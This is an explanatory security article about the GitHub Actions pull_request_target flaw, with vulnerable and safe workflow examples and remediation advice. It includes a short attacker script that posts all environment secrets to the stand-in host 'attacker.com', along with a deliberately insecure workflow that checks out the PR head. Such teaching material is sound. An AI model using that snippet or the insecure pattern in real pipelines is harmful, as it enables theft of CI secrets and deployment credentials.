Introduction: When Automation Becomes the Attack Vector
CI/CD pipelines are supposed to protect us from human error—but in some cases, they become the entry point for full-scale compromise. In late 2024, a researcher from Orca Security, Roin (roin-orca), uncovered a shocking vulnerability pattern in GitHub Actions workflows used by industry giants like Google and Microsoft. The discovery exposed a hidden truth: even the most sophisticated engineering organizations can fall prey to dangerous automation shortcuts.
The vulnerability revolved around a misunderstood GitHub Actions trigger—pull_request_target. A feature designed for convenience ended up providing attackers with the keys to the kingdom. By abusing how GitHub handles PRs from forks, an attacker could get their malicious code executed inside trusted environments, potentially accessing secrets, tokens, and deployment credentials. This wasn't an obscure corner case—it was a ticking time bomb hiding in plain sight across countless open-source projects.
How the Vulnerability Worked: The Dangerous Duality of pull_request_target
At first glance, pull_request_target seems like a helpful trigger. It lets workflows run in the context of the base repository instead of the contributor's fork. That means it has access to repository secrets, permissions, and write privileges—perfect for automations like commenting, labeling, or merging. But that's exactly the problem. When combined with untrusted PR code, this becomes a recipe for disaster.
Here's how it happens: by default, pull_request_target runs the workflow definition from the base branch, which is safe on its own. The trouble starts when that workflow explicitly checks out the PR's head and then runs files the contributor controls (for example, a test script or build tool). A malicious actor opens a pull request from their fork that modifies one of those files, and the workflow executes the change with the base repository's privileges. The attacker's code can then read or exfiltrate secrets. Even worse, it can achieve remote code execution (RCE) on the runner environment, essentially compromising your CI/CD machine.
This isn't theoretical. Roin's research showed that workflows in Google and Microsoft's public repositories were configured this way. The risk wasn't that these companies were negligent—it's that the subtle difference between pull_request and pull_request_target wasn't widely understood until someone weaponized it.
The Exploit in Action: Turning a Simple PR into Full Compromise
Imagine this scenario: You fork a repository and open a PR adding a new feature. In your PR, you modify a script—say, test/build.js. The repository uses pull_request_target to automatically run checks on all PRs. The workflow checks out your forked code, runs that script, and has full access to environment secrets like GITHUB_TOKEN or deployment keys.
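A workflow vulnerable to that scenario might look something like this (a hypothetical sketch; the script path and secret name are illustrative, and the dangerous part is the explicit checkout of the untrusted PR head):

```yaml
name: PR Checks (VULNERABLE - do not copy)
on:
  pull_request_target:   # runs with base-repo privileges and secrets
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # DANGEROUS: checks out the attacker's PR head instead of the base branch
          ref: ${{ github.event.pull_request.head.sha }}
      # Executes attacker-controlled code with secrets available in the environment
      - run: node test/build.js
        env:
          DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}
```

Without the `ref:` line, checkout would fetch the trusted base branch and the attacker's changes would never run; that one line is what turns a convenience trigger into an exploit.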
An attacker could inject something as simple as:
// test/build.js — attacker-controlled script run by the privileged workflow
const https = require("https");

// Grab every environment variable, including any injected secrets
const secrets = process.env;

// POST them all to a server the attacker controls
const req = https.request({
  hostname: "attacker.com",
  method: "POST",
  path: "/steal",
  headers: { "Content-Type": "application/json" }
});
req.end(JSON.stringify(secrets));
That's it—instant exfiltration. Once the PR is opened, the workflow runs automatically and leaks secrets without ever needing to be merged. It's an elegant, terrifyingly simple exploit that highlights how automation and trust boundaries can crumble with a single misconfigured trigger.
The Aftermath: How Big Tech Reacted and the Industry Wake-Up Call
When Orca Security responsibly disclosed the issue, the response was swift. GitHub, Google, and Microsoft patched affected workflows, rotated compromised tokens, and updated documentation to emphasize the dangers of pull_request_target. But the larger story wasn't about a single vulnerability—it was about how pervasive insecure workflow design had become.
Thousands of open-source maintainers began auditing their workflows, realizing they had unknowingly exposed their repositories to similar risks. Security researchers started scanning for pull_request_target patterns in public repos, finding alarming results. The uncomfortable truth emerged: many developers were using this trigger for convenience, not understanding its implications.
This was a moment of reckoning for the developer community. It showed that CI/CD pipelines—often treated as operational plumbing—are part of the attack surface. Automation doesn't mean safety; it means amplified risk if not handled correctly.
Best Practices: How to Avoid This Mistake
To avoid repeating this nightmare, you need a clear rule: never execute untrusted code with access to secrets. For public repositories, prefer the pull_request trigger: for PRs from forks, it runs the workflow without repository secrets and with only a read-only GITHUB_TOKEN, so even malicious PR code has nothing worth stealing.
If you must use pull_request_target, treat it like radioactive material. Use it only for workflows that never run PR code: labeling, commenting, or validating metadata. And if you absolutely must check out PR code, scope permissions down to read-only, never execute anything from the checkout, and treat every PR-supplied value as hostile input.
A secure workflow should look like this:
name: Safe PR Checks
on:
  pull_request:
    types: [opened, synchronize]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test
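And if you genuinely need pull_request_target for metadata automation such as labeling, a minimal sketch could look like the following (assuming the actions/labeler action and its usual configuration file; note that no PR code is ever checked out or executed):

```yaml
name: Label PRs
on:
  pull_request_target:
    types: [opened]
permissions:
  contents: read        # read the labeler config from the base branch
  pull-requests: write  # apply labels to the PR
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      # No checkout of the PR head, so no untrusted code ever runs
      - uses: actions/labeler@v5
```

The design choice that makes this safe is the absence of any step that fetches or runs contributor-supplied files; the elevated token is used only to write labels.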
Security in CI/CD is about intent. Understand why your workflow exists and who it's running for. Automation is a double-edged sword—sharp, efficient, and dangerous when mishandled.
The Brutal Truth: Security Debt Is Technical Debt
Every shortcut you take in your CI/CD workflow today becomes tomorrow's breach headline. The Google–Microsoft incident was a wake-up call for everyone building software on GitHub. It proved that even the most secure organizations can fall for design oversights when the system's complexity obscures its risks.
The brutal truth? Most developers don't think about their CI pipelines as part of the attack surface. They see them as neutral automation tools. But attackers see them as a goldmine—privileged machines running unreviewed code. You can't secure what you don't understand, and pull_request_target exposed exactly that gap in understanding.
If you maintain an open-source project, it's time to review your workflows. Check every on: trigger, review your permissions, and stop trusting automation by default. In the security world, trust is earned—not assumed.
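As a starting point for that audit, a quick grep over your workflow files flags every use of the risky trigger. The sketch below builds a throwaway directory to stand in for a repository; in practice you would run the final grep from your repo root:

```shell
# Simulate a repository containing one workflow that uses the risky trigger
mkdir -p /tmp/wf-audit/.github/workflows
cat > /tmp/wf-audit/.github/workflows/ci.yml <<'EOF'
on:
  pull_request_target:
    types: [opened, synchronize]
EOF

# List every workflow file that mentions pull_request_target
grep -rl "pull_request_target" /tmp/wf-audit/.github/workflows
```

Each file this prints deserves a manual review: does it check out PR code, and what permissions and secrets does it expose?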
Conclusion: Lessons Learned from the Pull Request Nightmare
Roin's discovery was more than a vulnerability report—it was a mirror held up to the industry's complacency. GitHub Actions gave developers immense power, but power without understanding breeds chaos. The pull_request_target flaw reminded us that security isn't about patching after the fact; it's about designing with threat models in mind from day one.
The next time you write a GitHub workflow, remember this story. Every trigger is a security decision. Every convenience is a potential trade-off. The nightmare wasn't that attackers could exploit a PR—it's that developers unknowingly invited them in.
Automation is only as safe as your discipline. And if you don't audit it, someone else will.